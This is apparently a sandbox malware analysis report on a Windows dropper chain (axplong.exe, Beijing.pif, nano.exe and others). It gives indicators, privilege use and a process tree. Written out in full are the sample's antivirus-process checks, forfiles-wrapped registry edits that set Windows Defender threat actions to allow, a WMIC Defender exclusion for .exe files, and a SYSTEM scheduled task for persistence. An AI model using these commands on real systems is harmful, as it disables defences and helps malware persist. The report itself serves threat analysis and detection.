\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ff3ab8f7-0000-0000-0000-d01200000000}\MaxCapacity = "14116" TFXDRjP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" TFXDRjP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" TFXDRjP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2064 schtasks.exe 1692 schtasks.exe 3240 schtasks.exe 2640 schtasks.exe 1892 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeaxplong.exeaxplong.exeBeijing.pifRestructuring.pifBeijing.pifpid process 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe 3204 axplong.exe 3204 axplong.exe 4444 axplong.exe 4444 axplong.exe 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 4876 Restructuring.pif 4876 Restructuring.pif 4876 Restructuring.pif 4876 Restructuring.pif 4876 Restructuring.pif 4876 Restructuring.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
nano.exepid process 852 nano.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exenano.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 732 tasklist.exe Token: SeDebugPrivilege 1964 tasklist.exe Token: SeDebugPrivilege 4056 tasklist.exe Token: SeDebugPrivilege 4764 tasklist.exe Token: SeDebugPrivilege 1008 tasklist.exe Token: SeDebugPrivilege 4232 tasklist.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 3636 powershell.exe Token: SeIncreaseQuotaPrivilege 752 WMIC.exe Token: SeSecurityPrivilege 752 WMIC.exe Token: SeTakeOwnershipPrivilege 752 WMIC.exe Token: SeLoadDriverPrivilege 752 WMIC.exe Token: SeSystemProfilePrivilege 752 WMIC.exe Token: SeSystemtimePrivilege 752 WMIC.exe Token: SeProfSingleProcessPrivilege 752 WMIC.exe Token: SeIncBasePriorityPrivilege 752 WMIC.exe Token: SeCreatePagefilePrivilege 752 WMIC.exe Token: SeBackupPrivilege 752 WMIC.exe Token: SeRestorePrivilege 752 WMIC.exe Token: SeShutdownPrivilege 752 WMIC.exe Token: SeDebugPrivilege 752 WMIC.exe Token: SeSystemEnvironmentPrivilege 752 WMIC.exe Token: SeRemoteShutdownPrivilege 752 WMIC.exe Token: SeUndockPrivilege 752 WMIC.exe Token: SeManageVolumePrivilege 752 WMIC.exe Token: 33 752 WMIC.exe Token: 34 752 WMIC.exe Token: 35 752 WMIC.exe Token: 36 752 WMIC.exe Token: SeIncreaseQuotaPrivilege 752 WMIC.exe Token: SeSecurityPrivilege 752 WMIC.exe Token: SeTakeOwnershipPrivilege 752 WMIC.exe Token: SeLoadDriverPrivilege 752 WMIC.exe Token: SeSystemProfilePrivilege 752 WMIC.exe Token: SeSystemtimePrivilege 752 WMIC.exe Token: SeProfSingleProcessPrivilege 752 WMIC.exe Token: SeIncBasePriorityPrivilege 752 WMIC.exe Token: SeCreatePagefilePrivilege 752 WMIC.exe Token: SeBackupPrivilege 752 WMIC.exe Token: SeRestorePrivilege 752 WMIC.exe Token: SeShutdownPrivilege 752 WMIC.exe Token: SeDebugPrivilege 752 WMIC.exe Token: SeSystemEnvironmentPrivilege 752 WMIC.exe Token: SeRemoteShutdownPrivilege 752 WMIC.exe Token: SeUndockPrivilege 752 WMIC.exe Token: SeManageVolumePrivilege 752 WMIC.exe Token: 33 752 WMIC.exe Token: 34 752 WMIC.exe Token: 35 752 WMIC.exe Token: 36 752 WMIC.exe Token: SeDebugPrivilege 852 nano.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 4176 powershell.EXE Token: SeDebugPrivilege 4556 powershell.exe Token: SeDebugPrivilege 4180 powershell.exe Token: SeAssignPrimaryTokenPrivilege 956 WMIC.exe Token: SeIncreaseQuotaPrivilege 956 WMIC.exe Token: SeSecurityPrivilege 956 WMIC.exe Token: SeTakeOwnershipPrivilege 956 WMIC.exe Token: SeLoadDriverPrivilege 956 WMIC.exe Token: SeSystemtimePrivilege 956 WMIC.exe Token: SeBackupPrivilege 956 WMIC.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
Processes:
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeBeijing.pifRestructuring.pifBeijing.pifbuild2.exepid process 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 4876 Restructuring.pif 4876 Restructuring.pif 4876 Restructuring.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif 2924 build2.exe -
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
Beijing.pifRestructuring.pifBeijing.pifpid process 3076 Beijing.pif 3076 Beijing.pif 3076 Beijing.pif 4876 Restructuring.pif 4876 Restructuring.pif 4876 Restructuring.pif 3196 Beijing.pif 3196 Beijing.pif 3196 Beijing.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeaxplong.exeruntime.execmd.exeBeijing.pifcmd.exePctOccurred.exeruntime.execmd.exedescription pid process target process PID 1988 wrote to memory of 3204 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe axplong.exe PID 1988 wrote to memory of 3204 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe axplong.exe PID 1988 wrote to memory of 3204 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe axplong.exe PID 3204 wrote to memory of 224 3204 axplong.exe runtime.exe PID 3204 wrote to memory of 224 3204 axplong.exe runtime.exe PID 3204 wrote to memory of 224 3204 axplong.exe runtime.exe PID 224 wrote to memory of 4564 224 runtime.exe cmd.exe PID 224 wrote to memory of 4564 224 runtime.exe cmd.exe PID 224 wrote to memory of 4564 224 runtime.exe cmd.exe PID 3204 wrote to memory of 2224 3204 axplong.exe DOC.exe PID 3204 wrote to memory of 2224 3204 axplong.exe DOC.exe PID 3204 wrote to memory of 2224 3204 axplong.exe DOC.exe PID 4564 wrote to memory of 732 4564 cmd.exe tasklist.exe PID 4564 wrote to memory of 732 4564 cmd.exe tasklist.exe PID 4564 wrote to memory of 732 4564 cmd.exe tasklist.exe PID 4564 wrote to memory of 884 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 884 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 884 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 1964 4564 cmd.exe tasklist.exe PID 4564 wrote to memory of 1964 4564 cmd.exe tasklist.exe PID 4564 wrote to memory of 1964 4564 cmd.exe tasklist.exe PID 4564 wrote to memory of 2548 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 2548 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 2548 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 4232 4564 cmd.exe cmd.exe PID 4564 wrote to memory of 4232 4564 cmd.exe cmd.exe PID 4564 wrote to memory of 4232 4564 cmd.exe cmd.exe PID 4564 wrote to memory of 4940 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 4940 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 4940 4564 cmd.exe findstr.exe PID 4564 wrote to memory of 1484 4564 cmd.exe cmd.exe PID 4564 wrote to memory of 1484 4564 cmd.exe cmd.exe PID 4564 wrote to memory of 1484 4564 cmd.exe cmd.exe PID 4564 wrote to memory of 3076 4564 cmd.exe Beijing.pif PID 4564 wrote to memory of 3076 4564 cmd.exe Beijing.pif PID 4564 wrote to memory of 3076 4564 cmd.exe Beijing.pif PID 4564 wrote to memory of 4068 4564 cmd.exe choice.exe PID 4564 wrote to memory of 4068 4564 cmd.exe choice.exe PID 4564 wrote to memory of 4068 4564 cmd.exe choice.exe PID 3076 wrote to memory of 1980 3076 Beijing.pif cmd.exe PID 3076 wrote to memory of 1980 3076 Beijing.pif cmd.exe PID 3076 wrote to memory of 1980 3076 Beijing.pif cmd.exe PID 3076 wrote to memory of 5112 3076 Beijing.pif cmd.exe PID 3076 wrote to memory of 5112 3076 Beijing.pif cmd.exe PID 3076 wrote to memory of 5112 3076 Beijing.pif cmd.exe PID 1980 wrote to memory of 1692 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 1692 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 1692 1980 cmd.exe schtasks.exe PID 3204 wrote to memory of 1160 3204 axplong.exe PctOccurred.exe PID 3204 wrote to memory of 1160 3204 axplong.exe PctOccurred.exe PID 3204 wrote to memory of 1160 3204 axplong.exe PctOccurred.exe PID 1160 wrote to memory of 4020 1160 PctOccurred.exe cmd.exe PID 1160 wrote to memory of 4020 1160 PctOccurred.exe cmd.exe PID 1160 wrote to memory of 4020 1160 PctOccurred.exe cmd.exe PID 3204 wrote to memory of 4900 3204 axplong.exe runtime.exe PID 3204 wrote to memory of 4900 3204 axplong.exe runtime.exe PID 3204 wrote to memory of 4900 3204 axplong.exe runtime.exe PID 4900 wrote to memory of 4644 4900 runtime.exe cmd.exe PID 4900 wrote to memory of 4644 4900 runtime.exe cmd.exe PID 4900 wrote to memory of 4644 4900 runtime.exe cmd.exe PID 4020 wrote to memory of 4056 4020 cmd.exe tasklist.exe PID 4020 wrote to memory of 4056 4020 cmd.exe tasklist.exe PID 4020 wrote to memory of 4056 4020 cmd.exe tasklist.exe PID 4020 wrote to memory of 2508 4020 cmd.exe findstr.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3432
-
C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe"C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe"C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:732 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵PID:884
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1964 -
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2548 -
C:\Windows\SysWOW64\cmd.execmd /c md 403656⤵
- System Location Discovery: System Language Discovery
PID:4232 -
C:\Windows\SysWOW64\findstr.exefindstr /V "HopeBuildersGeniusIslam" Sonic6⤵
- System Location Discovery: System Language Discovery
PID:4940 -
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s6⤵PID:1484
-
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pifBeijing.pif s6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe"C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe"C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe"7⤵
- Executes dropped EXE
PID:1160 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FB.tmp\Install.exe.\Install.exe8⤵
- Executes dropped EXE
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe.\Install.exe /sjJKLdidMdi "385133" /S9⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:1792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:3512
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
PID:3488 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:1992 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵PID:4704
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:5028 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵
- System Location Discovery: System Language Discovery
PID:4832 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
PID:3664 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:116 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 613⤵
- System Location Discovery: System Language Discovery
PID:4904 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
PID:3484 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:4824 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 613⤵PID:4512
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"11⤵
- Indirect Command Execution
PID:4688 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵PID:4420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2920 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force14⤵PID:3484
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"10⤵
- Indirect Command Execution
PID:4832 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵PID:2740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
- Suspicious use of AdjustPrivilegeToken
PID:752 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPUvzXzfJRZdhTmsKY" /SC once /ST 22:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe\" wc /ydidAPN 385133 /S" /V1 /F10⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:2924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 7528⤵
- Program crash
PID:924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8008⤵
- Program crash
PID:4236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8608⤵
- Program crash
PID:4528 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 9128⤵
- Program crash
PID:3128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 9208⤵
- Program crash
PID:648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 9208⤵
- Program crash
PID:2688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 11248⤵
- Program crash
PID:456 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 11248⤵
- Program crash
PID:4268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 11288⤵
- Program crash
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe"8⤵
- Executes dropped EXE
PID:1996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 5569⤵
- Program crash
PID:4776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 5969⤵
- Program crash
PID:1992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 6209⤵
- Program crash
PID:2900 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 8089⤵
- Program crash
PID:5024 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 8769⤵
- Program crash
PID:4176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 9129⤵
- Program crash
PID:4400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 8929⤵
- Program crash
PID:5024 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 9649⤵
- Program crash
PID:2012 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 9729⤵
- Program crash
PID:3968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 11009⤵
- Program crash
PID:3424 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 11009⤵
- Program crash
PID:3544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 11289⤵
- Program crash
PID:3656 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 11248⤵
- Program crash
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:852 -
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe"C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe"C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit5⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4056 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2508 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4764 -
